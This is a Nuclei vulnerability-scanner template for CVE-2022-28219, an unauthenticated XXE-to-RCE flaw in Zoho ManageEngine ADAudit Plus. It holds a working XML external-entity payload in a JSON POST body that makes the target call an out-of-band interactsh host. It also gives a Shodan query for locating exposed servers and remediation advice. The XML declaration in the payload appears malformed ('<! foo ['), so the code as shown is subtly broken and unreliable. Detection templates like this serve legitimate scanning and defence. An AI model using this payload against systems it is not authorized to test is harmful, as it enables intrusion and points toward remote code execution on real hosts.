nuclei-templates/cves/2022/CVE-2022-28219.yaml

58 lines
1.7 KiB
YAML

id: CVE-2022-28219
info:
name: Zoho ManageEngine ADAudit Plus - Unauthenticated XXE to RCE
author: dwisiswant0
severity: critical
description: |
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
unauthenticated XXE attack that leads to Remote Code Execution.
This template supports the detection part only, to achieve an
XXE to RCE, see reference[2].
reference:
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://manageengine.com
remediation: |
Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
is configured with a dedicated service account with restricted privileges.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28219
cwe-id: CWE-611
metadata:
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
verified: "true"
tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
requests:
- method: POST
path:
- "{{BaseURL}}/api/agent/tabs/agentData"
headers:
Content-Type: application/json
body: |
[
{
"DomainName": "{{Host}}",
"EventCode": 4688,
"EventType": 0,
"TimeGenerated": 0,
"Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
}
]
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "ManageEngine"